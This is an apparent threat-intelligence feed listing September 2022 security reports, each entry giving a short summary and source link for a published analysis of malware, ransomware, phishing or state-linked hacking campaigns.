Intel Name:: SystemBC_Malware_Turns_Infected_Computers_into_SOCKS5_Proxies

Date of Scan:: 2022-09-23

Impact:: LOW

Summary:: BitSight researchers have observed that SystemBC malware still turns infected computers into SOCKS5 proxy servers. Most bots cannot be reached from the internet, so this malware uses a backconnect architecture that allows clients to access proxy servers without having to interact directly with them.

Source: https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes

Intel Source:: ASEC

Intel Name:: A_Deep_Analysis_of_Lazarus_Group_Rootkit_Attack_Using_BYOVD

Date of Scan:: 2022-09-23

Impact:: LOW

Summary:: Researchers from ASEC have done a deep analysis of Lazarus Group Rootkit Attack using BYOVD. They are known to be hackers from North Korea, who have attacked various countries in America, Asia, and Europe.

Source: https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf

Intel Source:: ISC.SANS

Intel Name:: FODHelper_Delivering_Remcos_RAT

Date of Scan:: 2022-09-23

Impact:: LOW

Summary:: Researchers from SANS have identified a simple batch file that drops a Remcos RAT through an old UAC Bypass technique.

Source: https://isc.sans.edu/diary/rss/29078

Intel Source:: Palo Alto

Intel Name:: Cybercriminals_are_Increasingly_Using_Domain_Shadowing

Date of Scan:: 2022-09-23

Impact:: MEDIUM

Summary:: PaloAlto researchers have discovered that domain shadowing is more widespread than previously thought, discovering 12,197 cases between April and June 2022.

Source: https://unit42.paloaltonetworks.com/domain-shadowing/

Intel Source:: Cofense

Intel Name:: Hackers_Abusing_LinkedIn_Slink_to_Bypass_Secure_Email_Gateway

Date of Scan:: 2022-09-22

Impact:: LOW

Summary:: Cofense researchers have observed a phishing campaign that abuses LinkedIn smart links. While exploiting a well-known postal brand is nothing out of the ordinary, these phishing emails continue to pass undetected by popular email gateways.

Source: https://cofense.com/blog/threat-actors-abuse-linkedin-slink-to-bypass-secure-email-gateways

Intel Source:: TrendMicro

Intel Name:: Active_Exploitation_of_Atlassian_Confluence_Vulnerability

Date of Scan:: 2022-09-22

Impact:: LOW

Summary:: Researchers from Trendmicro have observed the active exploitation samples abusing the Atlassian Confluence vulnerability (CVE-2022-26134) in the wild for malicious cryptocurrency mining.

Source: https://www.trendmicro.com/en_us/research/22/i/atlassian-confluence-vulnerability-cve-2022-26134-abused-for-cryptocurrency-mining-other-malware.html

Intel Source:: Zscaler

Intel Name:: Diving_Deep_into_Crytox_Ransomware

Date of Scan:: 2022-09-22

Impact:: LOW

Summary:: Researchers from Zscaler have done technical analysis of Crytox Ransomware which is multi-stage ransomware with a weak key generation algorithm.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware

Intel Source:: CISA

Intel Name:: Iranian_hackers_Conduct_Cyber_Operations_Against_the_Government_of_Albania

Date of Scan:: 2022-09-22

Impact:: MEDIUM

Summary:: Researchers from CISA have identified one of the Iranian threat groups behind the destructive attack on the Albanian government's network in July lurking inside its systems for roughly 14 months.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-264a

Intel Source:: Cyble

Intel Name:: Distribution_of_NetSupport_RAT_via_SocGholish

Date of Scan:: 2022-09-22

Impact:: LOW

Summary:: Researchers from Cyble have observed that hackers are using fake browser update (SocGholish) to deliver the NetSupport RAT.

Source: https://blog.cyble.com/2022/09/21/netsupport-rat-distributed-via-socgholish/

Intel Source:: Cyble

Intel Name:: Zoom_Users_Targeted_by_Vidar_Stealer

Date of Scan:: 2022-09-21

Impact:: MEDIUM

Summary:: The researchers from Cyble have observed numerous fake Zoom sites that look exactly like the real Zoom sites. The purpose of these sites is to distribute malware disguised as the legitimate Zoom application.

Source: https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/

Intel Source:: MalwareBytes

Intel Name:: Hackers_Leveraging_Browser_Extensions

Date of Scan:: 2022-09-21

Impact:: LOW

Summary:: Malwarebytes researchers have detected a browser extension named PUP.Optional.AdMax. They have claimed to be adblockers and do have some, limited, functionality.

Source: https://www.malwarebytes.com/blog/detections/pup-optional-admax

Intel Source:: Recorded Future

Intel Name:: Attackers_Abusing_Google_Tag_Manager_Payment_Card_E-Skimming

Date of Scan:: 2022-09-21

Impact:: LOW

Summary:: According to Recorded Future researchers, 569 e-commerce domains have been infected by Magecart e-skimmers that exfiltrate stolen payment card information to GTM-based e-skimmer domains.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2022-0920.pdf

Intel Source:: Fortinet

Intel Name:: Konni_(RAT)_phishing_activity

Date of Scan:: 2022-09-21

Impact:: LOW

Summary:: Researchers at Fortinet recently caught a sophisticated phishing attempt deploying malware which they tied to APT 37 group's arsenal related to Konni and other RAT.

Source: https://www.fortinet.com/blog/threat-research/konni-rat-phishing-email-deploying-malware

Intel Source:: ISC.SANS

Intel Name:: Attackers_Leveraging_Free_Online_Resources_for_Phishing_Campaigns

Date of Scan:: 2022-09-21

Impact:: LOW

Summary:: Researchers from SANS have analyzed phishing campaigns using free online resources.

Source: https://isc.sans.edu/forums/diary/Phishing+Campaigns+Use+Free+Online+Resources/29074/

Intel Source:: ASEC

Intel Name:: Magniber_Ransomware_file_extension_changed_from_jse_to_js

Date of Scan:: 2022-09-21

Impact:: LOW

Summary:: Researchers from ASEC have analyzed the Magniber ransomware script and found that is still a javascript but its file extension changed from *.jse to *.js.

Source: https://asec.ahnlab.com/en/39030/

Intel Source:: VMware

Intel Name:: The_Growth_of_Chromeloader_Malware

Date of Scan:: 2022-09-20

Impact:: LOW

Summary:: Researchers from VMware have analyzed Chromeloader malware and warned of an ongoing campaign, In the campaign, malicious browser extensions, malware based on node-WebKit, and ransomware are being distributed.

Source: https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html

Intel Source:: Fortinet

Intel Name:: Multiple_Malwares_delivered_by_Excel_Document

Date of Scan:: 2022-09-20

Impact:: MEDIUM

Summary:: FortiGuard Labs recently caught captured an Excel document with an embedded malicious file in the wild. After some research on the file, Fortinet reserachers learned that it exploits a particular vulnerability —CVE-2017-11882—to execute malicious code which affecting Microoft Windows platforms and Windows users. Researchers picked the “lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe” file (being saved as “C:\Users\{UserName}\AppData\Roaming\word.exe”) as an example to analyze. It is the latest Formbook sample in the malware sample logs.

Source: https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882

Intel Source:: Cofense

Intel Name:: Microsoft_365_Phishing_Attacks_Targeting_US_Government_Agencies

Date of Scan:: 2022-09-20

Impact:: MEDIUM

Summary:: Cofense researchers have identified an ongoing phishing campaign targeting U.S. government contractors. In these phishing emails, scammers ask for bids for lucrative government projects, leading users to cloned versions of legitimate government websites.

Source: https://cofense.com/blog/credential-phishing-targeting-government-contractors-evolves-over-time

Intel Source:: BlackBerry

Intel Name:: Monster_RaaS_campaign_returned_as_a_new_variant

Date of Scan:: 2022-09-20

Impact:: MEDIUM

Summary:: BlackBerry Research & Intelligence team examined all samples about Monster ransomware which is delivered as a 32-bit binary. A hidden user interface gives threat actors control of multiple features of the ransomware on a victim’s machine, including selective encryption, self-deletion, and control over services and processes. Monster is also highly configurable, so threat actors can set their own custom extension and personalized ransom note.

Source: https://blogs.blackberry.com/en/2022/09/some-kind-of-monster-raas-hides-itself-using-traits-from-other-malware

Intel Source:: Cyble

Intel Name:: Fake_Telegram_Site_Delivering_RAT

Date of Scan:: 2022-09-20

Impact:: LOW

Summary:: Cyble Research and Intelligence Labs team identified a fake Telegram website masquerading as a legitimate website that downloads a malicious installer. This installer abuses the Windows Defender application to perform RAT operations.

Source: https://blog.cyble.com/2022/09/17/fake-telegram-site-delivering-rat-aimed-at-chinese-users/

Intel Source:: Fortinet

Intel Name:: The_Ragnar_Locker_ransomware_roundup_cover

Date of Scan:: 2022-09-20

Impact:: MEDIUM

Summary:: FortiGuard Labs gathered data on ransomware variants of interest that have been gaining traction within the OSINT community and our datasets. The Ransomware Roundup report aimed the Ragnar Locker ransomware to provide readers with brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against this variant.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-ragnar-locker-ransomware

Intel Source:: SentinelOne

Intel Name:: The_details_of_a_Publicly_Available_Slam_Ransomware_Builder

Date of Scan:: 2022-09-19

Impact:: LOW

Summary:: SentinelOne analysts detailed out thoroughly about Slam Ransomware Builder and how free ransomware builders like Slam offer an easy route into cybercrime and yet present a credible threat to organizations and enterprises. Plus they provided a detailed list of indicators to help security teams detect and protect against Slam ransomware payloads.

Source: https://www.sentinelone.com/blog/from-the-front-lines-slam-anatomy-of-a-publicly-available-ransomware-builder/

Intel Source:: Aquasec

Intel Name:: TeamTNT_threat_actors_targeting_cloud_environments

Date of Scan:: 2022-09-19

Impact:: LOW

Summary:: Aquasec analysts observed and analyzed three different attacks on their honeypots past week. The scripts and malware that were used bear a striking resemblance to none other than the threat actor TeamTNT.

Source: https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt

Intel Source:: ISC.SANS

Intel Name:: Preventing_ISO_Malware

Date of Scan:: 2022-09-19

Impact:: LOW

Summary:: Researchers from SANS have analyzed Chromeloader malware. This malware is a malicious extension for your browser, redirecting it to ad sites and hijacking searches. But with the success of this technique recently, I would not be surprised if others will take notice and switch to using it for other things.

Source: https://isc.sans.edu/diary/rss/29062

Intel Source:: ISC.SANS

Intel Name:: PreventingISOMalware

Date of Scan:: 2022-09-19

Impact:: LOW

Summary:: Researchers from SANS have analyzed Chromeloader malware. This malware is a malicious extension for your browser, redirecting it to ad sites and hijacking searches. But with the success of this technique recently, I would not be surprised if others will take notice and switch to using it for other things.

Source: https://isc.sans.edu/diary/rss/29062

Intel Source:: Recorded Future

Intel Name:: Russia-Nexus_UAC-0113_Emulating_Telecommunication_Providers_in_Ukraine

Date of Scan:: 2022-09-19

Impact:: LOW

Summary:: Researchers at Insikt Group while monitoring UAC-0113 infrastructure, including the recurring use of dynamic DNS domains masquerading as telecommunication providers operating in Ukraine, which shows that the group's efforts to target entities in Ukraine remains ongoing. Domain masquerades can enable spearphishing campaigns or redirects that pose a threat to victim networks.

Source: https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf

Intel Source:: Securelist

Intel Name:: The_widespread_of_RedLine_stealer

Date of Scan:: 2022-09-19

Impact:: LOW

Summary:: Securelist's reserachers recently caught a suspicious activity which was a part of collection of malicious programs distributed in the form of a single installation file, self-extracting archive or other file with installer-type functionality.

Source: https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/

Intel Source:: Mandiant

Intel Name:: Trojanized_Putty_through_Phishing

Date of Scan:: 2022-09-16

Impact:: LOW

Summary:: Researchers from Mandiant identified a Trojanized Putty ISO payload being delivered through a fabricated job lure spear employed by the threat cluster tracked as UNC4034, suspected to be a part of "Operation Dream Job" campaigns.

Source: https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing

Intel Source:: MalwareBytes

Intel Name:: Scammers_Abuse_Microsoft_Edge's_News_Feed_Ads

Date of Scan:: 2022-09-16

Impact:: LOW

Summary:: Researchers from Malwarebytes have identified an ongoing malvertising campaign that is injecting ads in the Microsoft Edge News Feed to redirect potential victims to websites pushing tech support scams.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2022/09/microsoft-edges-news-feed-pushes-tech-support-scam

Intel Source:: Cloudsek

Intel Name:: Revived_Version_of_Raccoon_Stealer

Date of Scan:: 2022-09-16

Impact:: LOW

Summary:: CloudSEK researchers analyzed a Raccoon malware sample and found it to be an updated version of Raccoon stealer. In underground forums, the developer of Raccoon stealer is very active, regularly updating the malware and posting about new feature builds.

Source: https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon/?utm_source=rss&utm_medium=rss&utm_campaign=recordbreaker-the-resurgence-of-raccoon

Intel Source:: Netscope

Intel Name:: Hackers_Continue_to_Abuse_Google_Sites_and_Microsoft_Azure

Date of Scan:: 2022-09-16

Impact:: LOW

Summary:: Netskope researchers discovered a phishing campaign where attackers are abusing Google Sites and Microsoft Azure Web Apps to steal cryptocurrency wallets and accounts from Coinbase, MetaMask, Kraken, and Gemini.

Source: https://www.netskope.com/es/blog/attackers-continue-to-abuse-google-sites-and-microsoft-azure-to-host-cryptocurrency-phishing

Intel Source:: Cisco Talos

Intel Name:: Russia_linked_Gamaredon_APT_Targeting_Ukraine_Using_InfoStealer_Malware

Date of Scan:: 2022-09-16

Impact:: LOW

Summary:: Researchers at CiscoTalos have observed that Russian-linked Gamaredon has been targeting Ukrainian government, defense, and law enforcement agencies with a piece of a custom-made information stealer implant.

Source: https://blog.talosintelligence.com/2022/09/gamaredon-apt-targets-ukrainian-agencies.html

Intel Source:: ISC.SANS

Intel Name:: Word_Maldoc_With_CustomXML_and_Renamed_VBAProject

Date of Scan:: 2022-09-16

Impact:: LOW

Summary:: Researchers from SANS have analyzed samples and found one of them is that the VBA project file (ole file) is named FIzzyWAbnj.bin instead of the usual VBAProject.bin.

Source: https://isc.sans.edu/diary/rss/29056

Intel Source:: Sekoia

Intel Name:: PrivateLoader_the_most_widely_used_loader_in_2022

Date of Scan:: 2022-09-16

Impact:: LOW

Summary:: PrivateLoader became one of the most widespread loaders used for a PPI service in 2022. SEKOIA analysts tracked PrivateLoader’s network infrastructure for several months and recently conducted an in-depth analysis of the malware. In parallel, we also monitored activities related to the ruzki PPI malware service.

Source: https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

Intel Source:: JPCERT

Intel Name:: BlackTech_Threat_Group_ExploitsF5_BIG-IP_Vulnerability

Date of Scan:: 2022-09-16

Impact:: MEDIUM

Summary:: The JPCERT have identified an attack activity exploiting the F5 BIG-IP vulnerability (CVE-2022-1388) against Japanese organizations. It has been confirmed by the targeted organizations that data in BIG-IP has been compromised.

Source: https://blogs.jpcert.or.jp/en/2022/09/bigip-exploit.html

Intel Source:: Cluster25

Intel Name:: One_of_the_most_used_infostealer_Erbium

Date of Scan:: 2022-09-15

Impact:: LOW

Summary:: Cluster25' analysts observed that Erbium can become one of the most used infostealer by cyber criminals due to its wide range of capabilities and due to the growing demand for M-a-a-S.

Source: https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer

Intel Source:: CISA

Intel Name:: Iranian_Cyber_Actors_Exploiting_Known_Vulnerabilities

Date of Scan:: 2022-09-15

Impact:: MEDIUM

Summary:: Researchers from CISA have identified Iranian Islamic revolutionary guard corps-affiliated cyber actors exploiting vulnerabilities for data extortion and disk encryption for ransom operations.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-257a

Intel Source:: ProofPoint

Intel Name:: Hackers_Are_Using_Name_of_Queen_Elizabeth_II_in_Phishing_Attacks

Date of Scan:: 2022-09-15

Impact:: LOW

Summary:: Researchers at Proofpoint have identified threat actors exploiting the death of Queen Elizabeth II in phishing attacks to steal their targets' Microsoft accounts.

Source: https://twitter.com/threatinsight/status/1570092339984584705

Intel Source:: ISC.SANS

Intel Name:: Malicious_Word_Document_With_a_Frameset

Date of Scan:: 2022-09-15

Impact:: LOW

Summary:: SANS researchers have discovered a malicious Word OOXML document (the new ".docx" format) that is a simple downloader. No malicious code is contained in this document, but merely a reference to a second stage which will be delivered when the document is opened.

Source: https://isc.sans.edu/diary/rss/29052

Intel Source:: Cyble

Intel Name:: Greek_Banking_Users_Targeted_in_Phishing_Campaign

Date of Scan:: 2022-09-15

Impact:: LOW

Summary:: Researchers from Cyble discovered multiple URLs hosting pages pretending to be Greece's tax refund website. In order to transfer funds, users must confirm their current account number and the amount of their tax refund.

Source: https://blog.cyble.com/2022/09/14/phishing-campaign-targets-greek-banking-users/

Intel Source:: Symantec

Intel Name:: Webworm_hackers_modify_old_malware_in_new_attacks

Date of Scan:: 2022-09-15

Impact:: LOW

Summary:: Researcher from Symantec have observed that the Chinese 'Webworm' hacking group is experimenting with customizing old malware in new attacks, likely to evade attribution and reduce operations costs.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats

Intel Source:: Cyble

Intel Name:: Japanese_Taxpayers_Targeted_in_Phishing_Campaign

Date of Scan:: 2022-09-15

Impact:: LOW

Summary:: Researchers from Cyble Research & Intelligence Labs discovered a new phishing campaign imitating the National Tax Agency, which targets Japanese users by tricking them into sharing sensitive information.

Source: https://blog.cyble.com/2022/09/13/phishing-campaign-targets-japanese-tax-payers/

Intel Source:: Cybereason

Intel Name:: Exploiting_Notepad++_Plugins_for_Evasion_and_Persistence

Date of Scan:: 2022-09-15

Impact:: LOW

Summary:: Researchers from Cybereason have analyzed a specific technique that leverages Notepad++ plugins to persist and evade security mechanisms on a machine.

Source: https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence

Intel Source:: Secureworks

Intel Name:: A_detailed_Analysis_of_Iranian_COBALT_MIRAGE_Threat_Group

Date of Scan:: 2022-09-14

Impact:: LOW

Summary:: Researchers at Secureworks have analyzed ransomware incidents and uncovered details about Iranian COBALT MIRAGE operations. During this incident, COBALT MIRAGE exploited ProxyShell vulnerabilities (CVE-2021-34473, 2021-34523, and 2021-30207).

Source: https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors

Intel Source:: Palo Alto

Intel Name:: A_new_variant_of_Agent_Tesla

Date of Scan:: 2022-09-14

Impact:: LOW

Summary:: The Agent Tesla keylogger’s developers announced and posted on the Agent Tesla Discord server that people should switch over to a new keylogger OriginLogger, a powerful software like Agent Tesla. OriginLogger is an AT-based software and has all the features. OriginLogger is a variant of Agent Tesla. As such, the majority of tools and detections for Agent Tesla will still trigger on OriginLogger samples.

Source: https://unit42.paloaltonetworks.com/originlogger/

Intel Source:: WeliveSecurity

Intel Name:: New_Linux_SideWalk_backdoor_Variant_used_by_SparklingGoblin_APT_Hackers

Date of Scan:: 2022-09-14

Impact:: LOW

Summary:: ESET researchers have discovered a Linux variant of the SideWalk backdoor used by SparklingGoblin. This is a group of APTs that partially overlaps with APT41 and BARIUM in terms of its tactics, techniques, and procedures.

Source: https://www.welivesecurity.com/2022/09/14/you-never-walk-alone-sidewalk-backdoor-linux-variant/

Intel Source:: TrendMicro

Intel Name:: Hackers_Exploiting_Oracle_WebLogic_Server_Vulnerabilities

Date of Scan:: 2022-09-14

Impact:: MEDIUM

Summary:: Trendmicro researchers have observed malicious actors exploiting both newly disclosed and older Oracle WebLogic Server vulnerabilities to deliver cryptocurrency-mining malware.

Source: https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html

Intel Source:: ISC.SANS

Intel Name:: Easy_Process_Injection_within_Python

Date of Scan:: 2022-09-14

Impact:: LOW

Summary:: Researchers from SANS have analyzed malicious Python scripts. It can call any Microsoft API and perform process injection using the classic VirtualAlloc, CreateRemoteThreat, etc.

Source: https://isc.sans.edu/diary/rss/29048

Intel Source:: ASEC

Intel Name:: A_distribution_of_masking_phishing_websites

Date of Scan:: 2022-09-14

Impact:: LOW

Summary:: During the collecting of various malware strains the ASEC analysts caught one targeting Korean users, which was being distributed continuously to Korean email accounts only since August. This phishing website’s URL is not only distributed through email but is also exposed among the top search results of the Google search engine.

Source: https://asec.ahnlab.com/en/38786/

Intel Source:: Symantec

Intel Name:: New_Espionage_Activity_Targeting_Asian_Governments

Date of Scan:: 2022-09-13

Impact:: LOW

Summary:: Researchers from Symantec have identified a campaign that targets government and state-owned organizations in several Asian countries, including the offices of multiple prime ministers or heads of government.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments

Intel Source:: Arcticwolf

Intel Name:: Mitel_VoIP_Appliance_Vulnerability_Exploited_by_Lorenz_Ransomware_Group

Date of Scan:: 2022-09-13

Impact:: LOW

Summary:: The Lorenz ransomware group was seen exploiting a critical-severity vulnerability in Mitel MiVoice VoIP appliance for initial access into a victim’s network, Arctic Wolf cybersecurity firm researchers reported.

Source: https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/

Intel Source:: ProofPoint

Intel Name:: Iranian_Hackers_Targeting_Nuclear_Security_and_Genomic_Research

Date of Scan:: 2022-09-13

Impact:: LOW

Summary:: Proofpoint researchers have discovered a cyberespionage campaign conducted by TA453 threat actors linked to Iran. It targeted individuals specializing in nuclear security, Middle Eastern affairs, and genome research. To target their victims, threat actors used at least two actor-controlled personas.

Source: https://www.proofpoint.com/us/blog/threat-insight/ta453-uses-multi-persona-impersonation-capitalize-fomo

Intel Source:: Microsoft

Intel Name:: Ransomware_Campaigns_Linked_to_Iranian_Govt's_DEV_0270_Hackers

Date of Scan:: 2022-09-13

Impact:: LOW

Summary:: Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of Iranian actor PHOSPHORUS.

Source: https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/

Intel Source:: DFIR Report

Intel Name:: Diving_Deep_into_Emotet_Malware

Date of Scan:: 2022-09-12

Impact:: LOW

Summary:: Researchers from DFIR have done a deep analysis of Emotet Malware

Source: https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/

Intel Source:: ISC.SANS

Intel Name:: Phishing_Word_Documents_with_Suspicious_URL

Date of Scan:: 2022-09-12

Impact:: LOW

Summary:: Researchers from SANS have analyzed a quarantined email that is marked as phishing by Defender with the Subject: Urgent Payment Issue.

Source: https://isc.sans.edu/diary/rss/29034

Intel Source:: Cofense

Intel Name:: A_new_form_of_delivery_of_the_Lampion_banking_trojan

Date of Scan:: 2022-09-12

Impact:: LOW

Summary:: Threat actors have been spotted by PDC analyst using a new form of Lampion malware thru using of a VBS loader. Using the trusted cloud platform used for payments, WeTransfer, threat actors are attempting to gain the trust of users while taking advantage of the service provided by the popular site.

Source: https://cofense.com/blog/lampion-trojan-utilizes-new-delivery-through-cloud-based-sharing

Intel Source:: Palo Alto

Intel Name:: Collecting_Credentials_Through_Third-Party_Software

Date of Scan:: 2022-09-09

Impact:: LOW

Summary:: PaloAlto researchers explored some common third-party software scenarios related to credential gathering, examining how passwords are stored, retrieved, and monitored based on real-world attack scenarios.

Source: https://unit42.paloaltonetworks.com/credential-gathering-third-party-software/

Intel Source:: SentinelOne

Intel Name:: Ransomware_Developers_Leveraging_Intermittent_Encryption_to_Avoid_Detection

Date of Scan:: 2022-09-09

Impact:: LOW

Summary:: SentinelOne researchers have observed that ransomware developers use intermittent encryption to evade detection. As a result of this encryption method, ransomware operators are able to evade detection systems and encrypt victims' files more quickly.

Source: https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/

Intel Source:: Microsoft

Intel Name:: A_Deep_Investigation_of_Albanian_Government_Cyberattacks

Date of Scan:: 2022-09-09

Impact:: LOW

Summary:: Microsoft researchers investigated Albanian government cyberattacks which disrupt public services and government websites. Besides the destructive cyberattack, MSTIC reports that an Iranian state-sponsored actor released sensitive information that had already been exfiltrated.

Source: https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/

Intel Source:: Secureworks

Intel Name:: Bronze_President_Group_Targeting_Government_Officials

Date of Scan:: 2022-09-09

Impact:: LOW

Summary:: Researchers from Secureworks have identified a PlugX malware campaign targeting computers belonging to government officials of several countries in Europe, the Middle East, and South America.

Source: https://www.secureworks.com/blog/bronze-president-targets-government-officials

Intel Source:: Cisco Talos

Intel Name:: Lazarus_Hackers_Targeting_Energy_Providers_Around_the_World

Date of Scan:: 2022-09-09

Impact:: MEDIUM

Summary:: A CiscoTalos study discovered that North Korea-linked Lazarus Group targeted energy providers around the world from February through July 2022, including U.S., Canadian, and Japanese companies.

Source: https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

Intel Source:: Palo Alto

Intel Name:: Moobot_Botnet_Targeting_Unpatched_D-Link_Routers

Date of Scan:: 2022-09-08

Impact:: LOW

Summary:: Researchers from PaloAlto have discovered attacks leveraging several vulnerabilities in D-Link routers and the vulnerabilities exploited include CVE-2015-2051, CVE-2018-6530, CVE-2022-26258, and CVE-2022-28958.

Source: https://unit42.paloaltonetworks.com/moobot-d-link-devices/?web_view=true#post-124794-_73lw4g4a4pw2

Intel Source:: Wordsfence

Intel Name:: Zero-Day_Vulnerability_Exploited_in_BackupBuddy_Plugin

Date of Scan:: 2022-09-08

Impact:: LOW

Summary:: Wordfence's Threat Intelligence team have discovered a zero-day vulnerability being actively exploited in BackupBuddy. It is a WordPress plugin with approximately 140,000 installations. The vulnerability allows unauthenticated users to download sensitive information from the affected site.

Source: https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/?web_view=true

Intel Source:: Cybereason

Intel Name:: A_Deep_Examination_of_PlugX_RAT_Loader

Date of Scan:: 2022-09-08

Impact:: LOW

Summary:: Cybereason researchers have investigated PlugX malware, a Remote Access Tool/Trojan (RAT) often used by Asian APT groups like APT27. With its many malicious "plugins," the malware has backdoor capabilities that allow it to take complete control over the environment.

Source: https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution

Intel Source:: Mandiant

Intel Name:: In-depth_exploration_of_APT42

Date of Scan:: 2022-09-08

Impact:: LOW

Summary:: Mandiant researchers have conducted a deep analysis of APT42 and published a report. This report examines APT42's recent and historical activities, its tactics, techniques, and procedures, targeting patterns, and historical connections to APT35.

Source: https://www.mandiant.com/media/17826 https://www.mandiant.com/resources/blog/apt42-charms-cons-compromises

Intel Source:: Cisco Talos

Intel Name:: A_new_remote_access_trojan_MagicRAT

Date of Scan:: 2022-09-08

Impact:: LOW

Summary:: Researchers at Cisco Talos have observed a new Remote Access Trojan from the Lazarus APT group being exploited in the wild for arbitrary command execution.

Source: https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html https://github.com/Cisco-Talos/IOCs/tree/main/2022/09

Intel Source:: Google blog

Intel Name:: Conti_Cybercrime_Hackers_Targeting_Ukraine

Date of Scan:: 2022-09-08

Impact:: LOW

Summary:: Researchers from Google Threat Analysis Group have identified some former Conti ransomware gang members are now part of a threat group tracked as UAC-0098, which is targeting Ukrainian organizations and European non-governmental organizations.

Source: https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/

Intel Source:: BlackBerry

Intel Name:: An_Unusual_Case_of_Monti_Ransomware

Date of Scan:: 2022-09-08

Impact:: LOW

Summary:: The BlackBerry Incident Response team have investigated an attack by a previously unknown group, calling itself "MONTI," which encrypted nearly 20 user hosts as well as a multi-host VMware ESXi cluster that brought down over 20 servers.

Source: https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger

Intel Source:: CISA

Intel Name:: Vice_Society_Ransomware_Targeting_Education_Sector

Date of Scan:: 2022-09-08

Impact:: LOW

Summary:: The FBI, CISA, and the MS-ISAC have recently observed Vice Society actors disproportionately targeting the education sector with ransomware attacks and they provided the network defenders with Vice Society IOCs and TTPs observed by the FBI in attacks for September 2022.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-249a

Intel Source:: Cyble

Intel Name:: Bumblebee_Malware_Back_With_New_Technique

Date of Scan:: 2022-09-08

Impact:: LOW

Summary:: Researchers from Cyble have came across a Twitter post wherein a researcher mentioned an interesting infection chain of the Bumblebee loader malware being distributed via spam campaigns.

Source: https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/

Intel Source:: Cyble

Intel Name:: Cyber_Attackers_Leveraging_Red_Teaming_Tools

Date of Scan:: 2022-09-07

Impact:: LOW

Summary:: Cyble Researchers have discovered threat actors actively using PowerShell Empire to spread multiple infections and also employ these tools to perform highly stealthy and dangerous attacks against their targets.

Source: https://blog.cyble.com/2022/09/06/adversaries-actively-utilizing-powershell-empire/

Intel Source:: Zscaler

Intel Name:: The_Ares_Banking_Trojan_Updated_with_Domain_Generation_Algorithm

Date of Scan:: 2022-09-07

Impact:: LOW

Summary:: In an update to the Ares banking trojan, researchers at Zscaler ThreatLabz observed a domain generation algorithm (DGA) that resembles Qakbot's. Threat actors attempt to maximize the life of an infection, which provides them with the opportunity to monetize compromised systems through wire fraud and ransomware attacks.

Source: https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga

Intel Source:: WeliveSecurity

Intel Name:: Worok_Hackers_Targeting_Asian_Companies_and_Governments

Date of Scan:: 2022-09-07

Impact:: LOW

Summary:: The new cyberespionage group Worok have discovered by WeLiveSecuruty reserachers which targeted attacks that used undocumented tools against various high-profile companies and local governments mostly in Asia.

Source: https://www.welivesecurity.com/2022/09/06/worok-big-picture/

Intel Source:: PRODAFT

Intel Name:: Diving_Deep_into_TA505_Group

Date of Scan:: 2022-09-07

Impact:: LOW

Summary:: Researchers from PRODAFT Threat Intelligence team have done in-depth analysis of TA505 Group. Also, identified the group’s control panel and used it to glean insight into how the organization works.

Source: https://www.prodaft.com/resource/detail/ta505-ta505-groups-tesla-gun-depth-analysis

Intel Source:: TeamCymru

Intel Name:: A_Detailed_Analysis_of_Mythic_C2_Framework

Date of Scan:: 2022-09-06

Impact:: LOW

Summary:: Researchers from TeamCymru have done detailed examinations of Mythic C2 Framework. It is a free-to-use, open-source tool, written in Python and provides cross-platform payload creation options for Linux, MacOS, and Windows.

Source: https://team-cymru.com/blog/2022/09/06/mythic-case-study-assessing-common-offensive-security-tools/

Intel Source:: Avast

Intel Name:: NoName057(16)_Hacker_Group_Targeting_Ukraine_Supporters_with_DDoS_Attack

Date of Scan:: 2022-09-06

Impact:: LOW

